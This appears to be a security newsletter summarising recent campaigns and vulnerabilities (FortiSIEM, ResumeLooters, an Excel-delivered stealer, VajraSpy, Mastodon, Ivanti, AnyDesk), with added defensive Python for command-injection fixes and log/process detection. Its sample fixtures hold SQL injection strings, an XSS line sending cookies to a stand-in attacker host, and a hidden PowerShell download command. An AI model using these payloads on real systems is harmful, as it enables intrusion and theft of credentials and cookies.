Insights into a malicious campaign dubbed ResumeLooters that targets job search platforms and exposes the personal data of job seekers.
🚨 Vulnerability of the Week
Fortinet FortiSIEM releases 6.4.0 through 7.1.1 are vulnerable to an “improper neutralization of special elements used in an OS command” flaw (OS command injection, CWE-78). A remote, unauthenticated attacker can reach the flaw through crafted API requests and execute unauthorized commands or code on the appliance. Because the SIEM sits at the centre of an organisation’s log collection, a compromised FortiSIEM host hands the attacker both a foothold and a view of the telemetry defenders rely on.
Affected versions:
FortiSIEM versions 6.4.0 through 6.4.2
FortiSIEM versions 6.5.0 through 6.5.2
FortiSIEM versions 6.6.0 through 6.6.3
FortiSIEM versions 6.7.0 through 6.7.8
FortiSIEM versions 7.0.0 through 7.0.2
FortiSIEM versions 7.1.0 through 7.1.1
Fortinet recommends upgrading to the following versions or above to mitigate the vulnerability:
FortiSIEM 7.1.2 or above
Upcoming FortiSIEM 7.2.0 or above
Upcoming FortiSIEM 7.0.3 or above
Upcoming FortiSIEM 6.7.9 or above
Upcoming FortiSIEM 6.6.5 or above
Upcoming FortiSIEM 6.5.3 or above
Upcoming FortiSIEM 6.4.4 or above
Until the “upcoming” builds ship, 7.1.2 is the only fixed release; on the other trains, restricting which hosts can reach the FortiSIEM API reduces exposure in the meantime.
Fortinet acknowledges the responsible disclosure of this vulnerability by security researcher Zach Hanley (@hacks_zach) of Horizon3.ai.
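To make the bug class concrete, here is an added illustration of CWE-78 in Python. It is not FortiSIEM code (the advisory does not publish the affected code path); it models a hypothetical API handler that takes a host parameter and runs a command with it, using `echo` in place of the real command so it runs anywhere. The host allow-list is an assumption for the example.

```python
"""OS command injection (CWE-78): the vulnerable pattern and two fixes.

Added illustration, not FortiSIEM code: the advisory does not publish the
affected code path, so this models the bug class with a hypothetical API
handler that takes a host parameter and runs a command with it. `echo`
stands in for the real command so the demo runs anywhere without network.
"""
import ipaddress
import re
import shlex
import subprocess
from typing import List

# Allow-list for the host parameter: an IP literal or an RFC 1123 hostname.
# (Constructed for the example; a real handler should derive this from the
# API's documented contract for the field.)
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME = re.compile(r"^(?:" + _LABEL + r"\.)*" + _LABEL + r"$")


def validate_host(host: str) -> str:
    """Reject anything that is not an IP address or a plain hostname."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if len(host) <= 253 and _HOSTNAME.match(host):
        return host
    raise ValueError(f"rejected host parameter: {host!r}")


def build_vulnerable(host: str) -> str:
    """The bug: caller input spliced into a string that a shell will parse.
    A value such as 'a; id' becomes a second command."""
    return f"echo host={host}"


def build_quoted(host: str) -> str:
    """Fallback when a shell is unavoidable: quote so metacharacters are inert."""
    return f"echo host={shlex.quote(host)}"


def build_hardened(host: str) -> List[str]:
    """Preferred fix: validate, then pass argv so no shell parses the input."""
    return ["echo", f"host={validate_host(host)}"]


def run_vulnerable(host: str) -> str:
    return subprocess.run(build_vulnerable(host), shell=True,
                          capture_output=True, text=True, check=True).stdout


def run_quoted(host: str) -> str:
    return subprocess.run(build_quoted(host), shell=True,
                          capture_output=True, text=True, check=True).stdout


def run_hardened(host: str) -> str:
    return subprocess.run(build_hardened(host), shell=False,
                          capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    payload = "10.0.0.1; echo INJECTED"
    print("vulnerable:", repr(run_vulnerable(payload)))   # second line: INJECTED
    print("quoted:    ", repr(run_quoted(payload)))       # one literal line
    try:
        run_hardened(payload)
    except ValueError as exc:
        print("hardened:  ", exc)                         # rejected before any exec
```

The order of preference is the point: argv with `shell=False` removes the shell from the path entirely, quoting only neutralises the shell's metacharacters, and validation against the field's contract catches the malformed value before either. Quoting alone also does nothing about the called program's own option parsing, which is why the allow-list is kept even in the argv version.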
In November 2023, Group-IB’s Threat Intelligence unit identified a large malicious campaign against employment agencies and retail companies in the Asia-Pacific (APAC) region. The threat actor, tracked as ResumeLooters and active since early 2023, compromises recruitment and retail websites with SQL injection and Cross-Site Scripting (XSS), extracts personal data and CVs, and sells them.
Between November and December 2023, the gang successfully compromised 65 websites, stealing a total of 2,188,444 rows of data, including 510,259 rows of user data from job search websites.
The main targets of ResumeLooters are companies in India, Taiwan, Thailand, and Vietnam, although compromised companies were also identified in other regions such as Brazil, the USA, Turkey, Russia, Mexico, and Italy.
The group stages a familiar mix of open-source and commercial tooling on its servers: sqlmap, Acunetix, BeEF (Browser Exploitation Framework), Xray, Metasploit, ARL (Asset Reconnaissance Lighthouse), and dirsearch.
SQL injection via sqlmap is the group’s primary initial vector for compromising websites, with XSS scripts also being injected into legitimate job search websites.
Analysis of the stolen HTML files showed malicious XSS scripts executing on at least four websites; the injected scripts rendered phishing forms intended to harvest administrator credentials.
The attackers advertised the sale of compromised data in Chinese-speaking hacking-themed Telegram groups.
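The campaign’s initial vector, SQL injection and XSS through a site’s own query parameters, leaves traces in ordinary web access logs. The following is an added detection example (not Group-IB’s tooling): it parses combined-format log lines, URL-decodes the request path repeatedly because attackers double-encode to slip past naive filters, and tags each request with the injection families seen in this campaign. The log lines are constructed for the demo using documentation IP ranges, and the sqlmap User-Agent shape is an assumption.

```python
"""Spotting ResumeLooters-style SQL injection and XSS probes in web access logs.

Added example, not Group-IB's tooling. Parses Apache/Nginx combined-format
lines, URL-decodes the path until stable, and tags injection families.
The sample lines are constructed; the sqlmap UA string is an assumption.
"""
import re
from urllib.parse import unquote_plus

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Each rule is (tag, pattern) applied to the fully decoded request path.
RULES = [
    ("sqli_union", re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("sqli_boolean", re.compile(r"\b(?:and|or)\s+(?:\d+|'[^']*')\s*=\s*(?:\d+|'[^']*')", re.I)),
    ("sqli_time", re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)),
    ("sqli_schema", re.compile(r"\binformation_schema\b", re.I)),
    ("xss", re.compile(r"<\s*script\b|\bon\w+\s*=|javascript\s*:|<\s*(?:img|svg|iframe)\b", re.I)),
]
# Default scanner User-Agents are a weak signal (trivially changed), but sqlmap
# is this group's primary tool and its default UA is a cheap tripwire.
SCANNER_UA = re.compile(r"sqlmap|acunetix|dirsearch", re.I)

LOG_LINES = [  # constructed sample input
    '203.0.113.10 - - [21/Nov/2023:10:01:02 +0000] "GET /jobs?q=python+developer HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/119.0"',
    '198.51.100.7 - - [21/Nov/2023:10:02:15 +0000] "GET /jobs?id=12%20AND%201%3D1 HTTP/1.1" 200 5123 "-" "sqlmap/1.7.11#stable (https://sqlmap.org)"',
    '198.51.100.7 - - [21/Nov/2023:10:02:16 +0000] "GET /candidate?id=5%20UNION%20ALL%20SELECT%20NULL%2Cusername%2Cpassword%20FROM%20users-- HTTP/1.1" 200 7311 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/119.0"',
    '198.51.100.7 - - [21/Nov/2023:10:02:21 +0000] "GET /jobs?id=5%27%20AND%20SLEEP(5)-- HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/119.0"',
    '198.51.100.7 - - [21/Nov/2023:10:03:40 +0000] "GET /search?q=%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fattacker.invalid%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/119.0"',
    '198.51.100.7 - - [21/Nov/2023:10:04:02 +0000] "GET /search?q=%2527%2520OR%25201%253D1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/119.0"',
]


def decode_fully(value, max_rounds=3):
    """URL-decode until stable, bounded so a pathological input cannot loop."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(line):
    """Return a finding for one log line, or None if it is clean or unparseable."""
    m = COMBINED.match(line)
    if not m:
        return None
    decoded = decode_fully(m["path"])
    tags = [tag for tag, pat in RULES if pat.search(decoded)]
    if SCANNER_UA.search(m["ua"]):
        tags.append("scanner_user_agent")
    if not tags:
        return None
    return {"ip": m["ip"], "path": m["path"], "decoded": decoded, "tags": tags}


def scan(lines):
    """Findings for every line that triggered at least one tag."""
    return [f for f in map(classify, lines) if f]


if __name__ == "__main__":
    for finding in scan(LOG_LINES):
        print(finding["ip"], finding["tags"], finding["decoded"])
```

Two points worth noting: the decode loop is what catches the double-encoded `%2527` probe that a single-pass WAF rule misses, and the patterns match on the decoded path rather than the raw one for the same reason. In production this runs against POST bodies too, which access logs do not capture; the XSS phishing forms the group injects would more often arrive that way.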
Art of Detection
In January 2024, FortiGuard Labs identified a sophisticated malware campaign run by a Vietnam-based hacking group that was previously active in August and September 2023. Delivered through a malicious Excel document, the campaign is notable for its multi-stage downloaders and heavy obfuscation.
Initial Attack Vector:
The campaign begins with a malicious Excel document whose VBA script runs a PowerShell command. That command downloads an innocuously named file, Windows Update.bat, from the public file-sharing service filebin.net.
Windows Update.bat is the first-stage downloader; its logic is buried under several layers of obfuscation (the Abobus obfuscator, non-English characters, and escape characters) so that it reads as noise to both analysts and signature-based scanners.
When executed, Windows Update.bat downloads test.vbs, which in turn fetches three components: script.py (the information stealer), Document.zip (a Python 3.11 runtime with the required libraries), and bypass.vbs (which launches the Python interpreter).
Script.py, closely resembling the stealer from the August 2023 campaign, collects browser cookies and saved login data from a wide range of browsers, including locally popular ones such as the Cốc Cốc browser.
The stolen data is compressed and sent to an attacker-controlled Telegram bot, so the actor needs no dedicated command-and-control infrastructure.
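Every stage above is a process-creation event with a telling parent, command line or path, which is what makes the chain detectable even though each file is obfuscated. The following is an added detection example, not FortiGuard’s code: it evaluates Sysmon-style process-creation events (Event ID 1 fields reduced to a dict) against four rules derived from the stages described. The events are constructed for the demo; the pids, user name and filebin.net URL path are placeholders, not real indicators.

```python
"""Process-tree detection for the Excel -> PowerShell -> .bat -> .vbs -> Python chain.

Added example, not FortiGuard's code. Scores Sysmon-style process-creation
events against four rules derived from the stages above. The sample events
are constructed; pids, paths and the filebin.net URL path are placeholders.
"""
import ntpath
import re

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_VERBS = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|\bcurl\b|\bwget\b", re.I)
# Extend with other file-sharing hosts seen in your environment; only filebin.net is from the report.
FILE_HOSTS = re.compile(r"https?://(?:[\w.-]+\.)?filebin\.net/", re.I)
USER_DIR_SCRIPT = re.compile(
    r"\\users\\[^\\]+\\(?:appdata\\local\\temp|downloads)\\[^\"]*?\.(?:vbs|bat|cmd)\b", re.I)
USER_DIR = re.compile(r"^[a-z]:\\users\\", re.I)

SAMPLE_EVENTS = [  # constructed; pids, user name and URL path are placeholders
    {"pid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" invoice.xlsm'},
    {"pid": 101, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "command_line": r"powershell.exe -w hidden -c iwr https://filebin.net/placeholder/Windows%20Update.bat -OutFile 'C:\Users\u\AppData\Local\Temp\Windows Update.bat'"},
    {"pid": 102, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'cmd.exe /c "C:\Users\u\AppData\Local\Temp\Windows Update.bat"'},
    {"pid": 103, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"wscript.exe C:\Users\u\AppData\Local\Temp\test.vbs"},
    {"pid": 104, "image": r"C:\Users\u\AppData\Local\Temp\Document\python.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": r"python.exe script.py"},
    {"pid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -c Get-Date"},
]


def _base(path):
    return ntpath.basename(path).lower()


def evaluate(event):
    """Return the names of the rules one event matches (empty list if benign)."""
    image, parent, cmd = _base(event["image"]), _base(event["parent_image"]), event["command_line"]
    hits = []
    if parent in OFFICE and image in SCRIPT_HOSTS:            # stage 1: macro spawns a script host
        hits.append("office_spawns_script_host")
    if image in {"powershell.exe", "pwsh.exe"} and DOWNLOAD_VERBS.search(cmd) and FILE_HOSTS.search(cmd):
        hits.append("powershell_download_from_file_host")      # stage 1: fetch from filebin.net
    if image in {"cmd.exe", "wscript.exe", "cscript.exe"} and USER_DIR_SCRIPT.search(cmd):
        hits.append("script_run_from_user_writable_dir")       # stages 2-3: .bat / .vbs in Temp
    if image in {"python.exe", "pythonw.exe"} and USER_DIR.match(event["image"]):
        hits.append("python_interpreter_from_user_profile")    # stage 4: dropped Python runtime
    return hits


def scan(events):
    """Map pid -> matched rules, omitting events that matched nothing."""
    out = {}
    for ev in events:
        hits = evaluate(ev)
        if hits:
            out[ev["pid"]] = hits
    return out


if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS).items():
        print(pid, rules)
```

Each rule alone is noisy (developers run Python from their profile, admins run scripts from Temp); the value is in correlating them along the parent chain within a short window, which the pid map here makes straightforward to extend. The Telegram exfiltration stage is best caught at the network layer rather than on the host, since the bot API is plain HTTPS to a legitimate domain.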
Insight into Hacker Group:
Because the actor relies on open platforms for hosting and delivery, repositories and files tied to the campaign could be examined directly; they reveal similarities with other commodity malware such as XWorm, VenomRAT, and RedLine.
🥷 TTP Analysis
ESET researchers, led by Lukas Stefanko (@LukasStefanko), uncovered twelve Android apps carrying the VajraSpy Remote Access Trojan (RAT) used by the Patchwork APT group.
Six of these apps were previously available on Google Play, accumulating over 1,400 installs before removal.
Except for one news app, the rest were promoted as chat applications.
Shared malicious code and class names place all twelve apps in the VajraSpy family, a customizable RAT employed by the Patchwork APT group.
What each app can steal depends on the permissions it is granted: contacts, files, SMS messages, call recordings, and photos taken with the camera.
Apps surfaced online between April 2021 and October 2023.
Predominantly targeted users in Pakistan.
Tactics included using the name of a prominent Pakistani cricket player as the developer name and defaulting to the PK country calling code on login screens.
Android users, particularly in Pakistan, should verify the authenticity of apps before installing them; a chat app from an unfamiliar developer that asks for contacts, SMS, microphone and camera permissions is exactly the profile described here.
Keep the platform’s built-in protections enabled and consider a reputable mobile security product to detect and block RAT infections.
CVE Identifier: CVE-2024-23832 (CVSS: 9.4)
An origin validation error in Mastodon that can lead to account takeover. Mastodon rates it critical (CVSS 9.4) and is withholding the technical details until February 15, 2024.
Affected versions:
All Mastodon versions prior to 3.5.17
4.0.x before 4.0.13, 4.1.x before 4.1.13, and 4.2.x before 4.2.5
Mastodon is an open-source social network with decentralized servers.
Admins manage separate servers with individual rules.
Gained popularity as an alternative to Twitter, particularly within the security community.
Response and Mitigation:
Mastodon urges administrators to promptly update servers to secure versions.
Specific details withheld to allow time for server updates.
Discovery credited to ‘arcaniscanis.’
Server administrators should update now rather than wait for the February 15 write-up; the details are being withheld so that most servers are patched before they are public, and that protection ends on the disclosure date.
The coordinated handling of the issue reflects the collaboration between Mastodon and the security community.
🌶️ Trending Exploit
CVE-2024-21893 is a Server-Side Request Forgery (SSRF) flaw in the Security Assertion Markup Language (SAML) component of Ivanti Connect Secure and Policy Secure.
The original exploit chain combined an authentication bypass (CVE-2023-46805) with a command injection (CVE-2024-21887) to obtain unauthenticated remote code execution, and Ivanti’s first mitigation file was written against that chain.
The SSRF (CVE-2024-21893) supplies a new unauthenticated route to the same command injection, so chaining the two bypasses the original mitigation and again yields arbitrary command execution, including Python-based reverse shell payloads.
Mitigation and Remediation:
Ivanti released a mitigation file for CVE-2023-46805 and CVE-2024-21887 before official patches were available; it did not stop the SSRF-based chain.
A second mitigation, released afterwards, blocks both exploit chains; Rapid7 verified that it stops the chain described above.
Official patches addressing all of these vulnerabilities have since been released.
Remediation is to apply the second mitigation and then install the official patch, following Ivanti’s knowledge base article. A mitigation only closes the door going forward: any appliance that was reachable while either chain was public should also be checked for signs of prior compromise before it is trusted again.
Credit to the security researchers involved and to the collaboration between Ivanti and Mandiant in identifying and addressing these vulnerabilities.
🕯️ The Topic of the Week
AnyDesk, a popular remote access solution used by enterprises worldwide, recently experienced a cyberattack resulting in the theft of source code and private code signing keys. The attack was detected by the company after indications of an incident on their production servers. This report summarizes the incident, AnyDesk’s response, and recommendations for users.
AnyDesk detected indications of a cyberattack on their production servers and initiated a security audit.
Source code and private code signing keys were stolen by threat actors during the attack.
The company confirmed that ransomware was not involved in the incident.
AnyDesk engaged cybersecurity firm CrowdStrike to assist in responding to the attack.
Security-related certificates were revoked, and affected systems were remediated or replaced.
AnyDesk assured customers that their platform was safe to use and that there was no evidence of end-user devices being affected.
The company advised users to ensure they are using the latest version of AnyDesk with the new code signing certificate.
As a precautionary measure, AnyDesk revoked all passwords to their web portal and recommended users change passwords if reused on other sites.
AnyDesk explained that session authentication tokens, crucial for the platform’s security, were not stolen during the attack.
The replacement code signing certificate first ships in AnyDesk 8.0.8, released on January 29th; older builds are signed with the certificate that was stolen and subsequently revoked.
Users are strongly advised to update to the latest version of AnyDesk to ensure continued security.
AnyDesk suffered a four-day outage starting on January 29th, during which users were unable to log in to the AnyDesk client.
Access was restored after maintenance, which was confirmed to be related to the cybersecurity incident.
Recommendations for Users:
Update to the latest version of AnyDesk, which carries the replacement code signing certificate.
Change the password of your AnyDesk account and of any other service where the same password was reused.
Because the stolen signing key could be used to sign malware that passes as a legitimate AnyDesk build, check the signer on any AnyDesk binary in your estate and treat anything signed with the old certificate that appeared after the incident as suspect rather than merely out of date.